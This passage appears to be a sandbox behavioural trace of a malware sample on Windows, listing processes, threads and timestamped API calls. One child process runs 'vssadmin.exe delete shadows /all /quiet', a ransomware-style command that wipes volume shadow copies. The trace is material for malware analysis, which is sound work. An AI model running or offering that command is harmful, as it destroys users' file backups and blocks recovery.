lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.306] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.308] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0212.311] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0216.537] SysReAllocStringLen (in: pbstr=0x12c4fdb0*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12c4fdb0*="KERNEL32.DLL") returned 1 [0216.537] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0216.537] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0216.541] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 235 os_tid = 0xb90 [0212.532] SysReAllocStringLen (in: pbstr=0x12b4f374*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12b4f374*="KERNEL32.DLL") returned 1 [0212.532] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.532] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.536] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0212.536] SysReAllocStringLen (in: pbstr=0x12b4f374*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12b4f374*="KERNEL32.DLL") returned 1 [0212.536] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.536] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.539] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0212.539] SysReAllocStringLen (in: pbstr=0x12b4f350*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12b4f350*="KERNEL32.DLL") returned 1 [0212.539] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0212.539] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0212.542] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0212.544] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0216.544] SysReAllocStringLen (in: pbstr=0x12b4f628*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12b4f628*="KERNEL32.DLL") returned 1 [0216.544] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0216.545] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0216.549] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Thread: id = 236 os_tid = 0x878 [0212.999] SysReAllocStringLen (in: pbstr=0x12dff924*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12dff924*="KERNEL32.DLL") returned 1 [0212.999] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0213.002] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0213.006] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0213.007] SysReAllocStringLen (in: pbstr=0x12dff924*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12dff924*="KERNEL32.DLL") returned 1 [0213.007] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0213.007] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0213.010] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0213.010] SysReAllocStringLen (in: pbstr=0x12dff900*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12dff900*="KERNEL32.DLL") returned 1 [0213.010] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0213.011] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0213.013] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0213.015] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0216.553] SysReAllocStringLen (in: pbstr=0x12dffbd8*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x12dffbd8*="KERNEL32.DLL") returned 1 [0216.553] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0216.554] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0216.559] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 Process: id = "2" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x971d000" os_pid = "0x370" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 13 os_tid = 0x888 Thread: id = 14 os_tid = 0x868 Thread: id = 15 os_tid = 0x808 Thread: id = 16 os_tid = 0x248 Thread: id = 17 os_tid = 0x570 Thread: id = 18 os_tid = 0x754 Thread: id = 19 os_tid = 0x5cc Thread: id = 20 os_tid = 0x40c Thread: id = 21 os_tid = 0x7c0 Thread: id = 22 os_tid = 0x1c0 Thread: id = 23 os_tid = 0x618 Thread: id = 24 os_tid = 0x3a4 Thread: id = 25 os_tid = 0xa34 Thread: id = 26 os_tid = 0xa94 Thread: id = 27 os_tid = 0x320 Thread: id = 28 os_tid = 0x6cc Thread: id = 29 os_tid = 0x42c Thread: id = 30 os_tid = 0x1e4 Thread: id = 31 os_tid = 0x760 Thread: id = 32 os_tid = 0x75c Thread: id = 33 os_tid = 0x74c Thread: id = 34 os_tid = 0x710 Thread: id = 35 os_tid = 0x6d0 Thread: id = 36 os_tid = 0x6bc Thread: id = 37 os_tid = 0x6b8 Thread: id = 38 os_tid = 0x6a8 Thread: id = 39 os_tid = 0x69c Thread: id = 40 os_tid = 0x698 Thread: id = 41 os_tid = 0x684 Thread: id = 42 os_tid = 0x678 Thread: id = 43 os_tid = 0x4a8 Thread: id = 44 os_tid = 0x46c Thread: id = 45 os_tid = 0x44c Thread: id = 46 os_tid = 0x424 Thread: id = 47 os_tid = 0x41c Thread: id = 48 os_tid = 0x404 Thread: id = 49 os_tid = 0x14c Thread: id = 50 os_tid = 0x3fc Thread: id = 51 os_tid = 0x3f4 Thread: id = 52 os_tid = 0x3e8 Thread: id = 53 os_tid = 0x39c Thread: id = 54 os_tid = 0x390 Thread: id = 55 os_tid = 0x388 Thread: id = 56 os_tid = 0x37c Thread: id = 57 os_tid = 0x374 Thread: id = 134 os_tid = 0x5e4 Thread: id = 135 os_tid = 0x150 Thread: id = 141 os_tid = 0x544 Thread: id = 157 os_tid = 0x7c0 Thread: id = 162 os_tid = 0x74c Thread: id = 164 os_tid = 0xa40 Thread: id = 166 os_tid = 0xba8 Thread: id = 167 os_tid = 0x64c Thread: id = 168 os_tid = 0xb44 Thread: id = 169 os_tid = 0xb00 Thread: id = 170 os_tid = 0x1c4 Thread: id = 171 os_tid = 0x1c0 Thread: id = 172 os_tid = 0xbb0 Thread: id = 183 os_tid = 0xb08 Thread: id = 199 os_tid = 0xba8 Thread: id = 208 os_tid = 0xb00 Thread: id = 209 os_tid = 0x64c Thread: id = 212 os_tid = 0x3d4 Thread: id = 213 os_tid = 0x548 Thread: id = 219 os_tid = 0x690 Thread: id = 223 os_tid = 0xe0 Thread: id = 263 os_tid = 0x614 Thread: id = 264 os_tid = 0x6a0 Thread: id = 265 os_tid = 0x38c Thread: id = 266 os_tid = 0x754 Thread: id = 267 os_tid = 0x25c Process: id = "3" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x6076a000" os_pid = "0xa4c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:00043806" [0xc000000f] Thread: id = 59 os_tid = 0xab8 Thread: id = 60 os_tid = 0xa0c Thread: id = 61 os_tid = 0xa6c Thread: id = 62 os_tid = 0xa68 Thread: id = 63 os_tid = 0xa64 Thread: id = 64 os_tid = 0xa60 Thread: id = 65 os_tid = 0xa54 Thread: id = 66 os_tid = 0xa50 Thread: id = 159 os_tid = 0xb0c Thread: id = 161 os_tid = 0x180 Thread: id = 163 os_tid = 0x6d8 Process: id = "4" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x61b65000" os_pid = "0xa10" os_integrity_level = "0x4000" os_privileges = "0xe60b1e990" monitor_reason = "rpc_server" parent_id = "2" os_parent_pid = "0x250" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d057" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 67 os_tid = 0xa88 Thread: id = 68 os_tid = 0xa30 Thread: id = 69 os_tid = 0xa2c Thread: id = 70 os_tid = 0xa28 Thread: id = 71 os_tid = 0xa24 Thread: id = 72 os_tid = 0xa20 Thread: id = 73 os_tid = 0xa18 Thread: id = 74 os_tid = 0xa14 Thread: id = 137 os_tid = 0x4dc Thread: id = 268 os_tid = 0xb2c Thread: id = 269 os_tid = 0x340 Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x3259f000" os_pid = "0xb40" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xba0" cmd_line = "\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 76 os_tid = 0xb5c [0113.262] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x38fd24 | out: lpSystemTimeAsFileTime=0x38fd24*(dwLowDateTime=0xf281f480, dwHighDateTime=0x1d6a20a)) [0113.262] GetCurrentProcessId () returned 0xb40 [0113.262] GetCurrentThreadId () returned 0xb5c [0113.262] GetTickCount () returned 0x1151ca5 [0113.262] QueryPerformanceCounter (in: lpPerformanceCount=0x38fd1c | out: lpPerformanceCount=0x38fd1c*=23331636973) returned 1 [0113.266] GetModuleHandleA (lpModuleName=0x0) returned 0x49ee0000 [0113.266] __set_app_type (_Type=0x1) [0113.266] __p__fmode () returned 0x770331f4 [0113.317] __p__commode () returned 0x770331fc [0113.318] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49f021a6) returned 0x0 [0113.318] __getmainargs (in: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c, _DoWildCard=0, _StartInfo=0x49f04140 | out: _Argc=0x49f04238, _Argv=0x49f04240, _Env=0x49f0423c) returned 0 [0113.318] GetCurrentThreadId () returned 0xb5c [0113.318] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb5c) returned 0x60 [0113.318] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0113.318] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0113.318] SetThreadUILanguage (LangId=0x0) returned 0x409 [0113.319] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.319] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x38fcb4 | out: phkResult=0x38fcb4*=0x0) returned 0x2 [0113.319] VirtualQuery (in: lpAddress=0x38fceb, lpBuffer=0x38fc84, dwLength=0x1c | out: lpBuffer=0x38fc84*(BaseAddress=0x38f000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0113.319] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x38fc84, dwLength=0x1c | out: lpBuffer=0x38fc84*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0113.319] VirtualQuery (in: lpAddress=0x291000, lpBuffer=0x38fc84, dwLength=0x1c | out: lpBuffer=0x38fc84*(BaseAddress=0x291000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0113.319] VirtualQuery (in: lpAddress=0x293000, lpBuffer=0x38fc84, dwLength=0x1c | out: lpBuffer=0x38fc84*(BaseAddress=0x293000, AllocationBase=0x290000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0113.319] VirtualQuery (in: lpAddress=0x390000, lpBuffer=0x38fc84, dwLength=0x1c | out: lpBuffer=0x38fc84*(BaseAddress=0x390000, AllocationBase=0x390000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0113.319] GetConsoleOutputCP () returned 0x1b5 [0113.320] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49f04260 | out: lpCPInfo=0x49f04260) returned 1 [0113.320] SetConsoleCtrlHandler (HandlerRoutine=0x49efe72a, Add=1) returned 1 [0113.320] _get_osfhandle (_FileHandle=1) returned 0x45c [0113.320] SetConsoleMode (hConsoleHandle=0x45c, dwMode=0x0) returned 0 [0113.320] _get_osfhandle (_FileHandle=1) returned 0x45c [0113.320] GetConsoleMode (in: hConsoleHandle=0x45c, lpMode=0x49f041ac | out: lpMode=0x49f041ac) returned 0 [0113.320] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0113.320] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x49f041b0 | out: lpMode=0x49f041b0) returned 1 [0113.346] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0113.346] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0113.357] GetEnvironmentStringsW () returned 0x1a2030* [0113.357] GetProcessHeap () returned 0x190000 [0113.357] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0xaca) returned 0x1a2b08 [0113.357] FreeEnvironmentStringsW (penv=0x1a2030) returned 1 [0113.357] GetProcessHeap () returned 0x190000 [0113.357] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0x4) returned 0x1a0c60 [0113.357] GetEnvironmentStringsW () returned 0x1a2030* [0113.357] GetProcessHeap () returned 0x190000 [0113.358] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0xaca) returned 0x1a35e0 [0113.358] FreeEnvironmentStringsW (penv=0x1a2030) returned 1 [0113.358] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x38ec24 | out: phkResult=0x38ec24*=0x68) returned 0x0 [0113.358] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x38ec2c, lpData=0x38ec30, lpcbData=0x38ec28*=0x1000 | out: lpType=0x38ec2c*=0x0, lpData=0x38ec30*=0x0, lpcbData=0x38ec28*=0x1000) returned 0x2 [0113.358] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x38ec2c, lpData=0x38ec30, lpcbData=0x38ec28*=0x1000 | out: lpType=0x38ec2c*=0x4, lpData=0x38ec30*=0x1, lpcbData=0x38ec28*=0x4) returned 0x0 [0113.358] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x38ec2c, lpData=0x38ec30, lpcbData=0x38ec28*=0x1000 | out: lpType=0x38ec2c*=0x0, lpData=0x38ec30*=0x1, lpcbData=0x38ec28*=0x1000) returned 0x2 [0113.358] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x38ec2c, lpData=0x38ec30, lpcbData=0x38ec28*=0x1000 | out: lpType=0x38ec2c*=0x4, lpData=0x38ec30*=0x0, lpcbData=0x38ec28*=0x4) returned 0x0 [0113.358] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x38ec2c, lpData=0x38ec30, lpcbData=0x38ec28*=0x1000 | out: lpType=0x38ec2c*=0x4, lpData=0x38ec30*=0x40, lpcbData=0x38ec28*=0x4) returned 0x0 [0113.358] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x38ec2c, lpData=0x38ec30, lpcbData=0x38ec28*=0x1000 | out: lpType=0x38ec2c*=0x4, lpData=0x38ec30*=0x40, lpcbData=0x38ec28*=0x4) returned 0x0 [0113.358] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x38ec2c, lpData=0x38ec30, lpcbData=0x38ec28*=0x1000 | out: lpType=0x38ec2c*=0x0, lpData=0x38ec30*=0x40, lpcbData=0x38ec28*=0x1000) returned 0x2 [0113.358] RegCloseKey (hKey=0x68) returned 0x0 [0113.359] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x38ec24 | out: phkResult=0x38ec24*=0x68) returned 0x0 [0113.359] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x38ec2c, lpData=0x38ec30, lpcbData=0x38ec28*=0x1000 | out: lpType=0x38ec2c*=0x0, lpData=0x38ec30*=0x40, lpcbData=0x38ec28*=0x1000) returned 0x2 [0113.359] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x38ec2c, lpData=0x38ec30, lpcbData=0x38ec28*=0x1000 | out: lpType=0x38ec2c*=0x4, lpData=0x38ec30*=0x1, lpcbData=0x38ec28*=0x4) returned 0x0 [0113.359] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x38ec2c, lpData=0x38ec30, lpcbData=0x38ec28*=0x1000 | out: lpType=0x38ec2c*=0x0, lpData=0x38ec30*=0x1, lpcbData=0x38ec28*=0x1000) returned 0x2 [0113.359] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x38ec2c, lpData=0x38ec30, lpcbData=0x38ec28*=0x1000 | out: lpType=0x38ec2c*=0x4, lpData=0x38ec30*=0x0, lpcbData=0x38ec28*=0x4) returned 0x0 [0113.359] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x38ec2c, lpData=0x38ec30, lpcbData=0x38ec28*=0x1000 | out: lpType=0x38ec2c*=0x4, lpData=0x38ec30*=0x9, lpcbData=0x38ec28*=0x4) returned 0x0 [0113.359] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x38ec2c, lpData=0x38ec30, lpcbData=0x38ec28*=0x1000 | out: lpType=0x38ec2c*=0x4, lpData=0x38ec30*=0x9, lpcbData=0x38ec28*=0x4) returned 0x0 [0113.359] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x38ec2c, lpData=0x38ec30, lpcbData=0x38ec28*=0x1000 | out: lpType=0x38ec2c*=0x0, lpData=0x38ec30*=0x9, lpcbData=0x38ec28*=0x1000) returned 0x2 [0113.359] RegCloseKey (hKey=0x68) returned 0x0 [0113.359] time (in: timer=0x0 | out: timer=0x0) returned 0x5f86c257 [0113.359] srand (_Seed=0x5f86c257) [0113.359] GetCommandLineW () returned="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet" [0113.359] GetCommandLineW () returned="\"cmd.exe\" /c vssadmin.exe delete shadows /all /quiet" [0113.360] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49f05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0113.361] GetProcessHeap () returned 0x190000 [0113.361] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0x210) returned 0x1a2030 [0113.361] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1a2038, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0113.362] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0113.362] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0113.362] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0113.362] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0113.362] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0113.362] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0113.362] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0113.362] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0113.362] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0113.362] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0113.362] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0113.362] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0113.362] GetProcessHeap () returned 0x190000 [0113.362] HeapFree (in: hHeap=0x190000, dwFlags=0x0, lpMem=0x1a2b08 | out: hHeap=0x190000) returned 1 [0113.362] GetEnvironmentStringsW () returned 0x1a2248* [0113.362] GetProcessHeap () returned 0x190000 [0113.362] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0xae2) returned 0x1a4ba8 [0113.363] FreeEnvironmentStringsW (penv=0x1a2248) returned 1 [0113.363] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0113.363] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49f10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0113.363] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0113.363] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0113.363] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0113.363] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0113.363] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0113.363] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0113.363] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0113.363] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0113.363] GetProcessHeap () returned 0x190000 [0113.363] RtlAllocateHeap (HeapHandle=0x190000, Flags=0x8, Size=0x54) returned 0x1a5698 [0113.363] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x38f9f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0113.363] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x38f9f0, lpFilePart=0x38f9ec | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x38f9ec*="Desktop") returned 0x25 [0113.363] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0113.364] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x38f76c | out: lpFindFileData=0x38f76c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x1a1eb0 [0113.364] FindClose (in: hFindFile=0x1a1eb0 | out: hFindFile=0x1a1eb0) returned 1 [0113.364] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x38f76c | out: lpFindFileData=0x38f76c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, 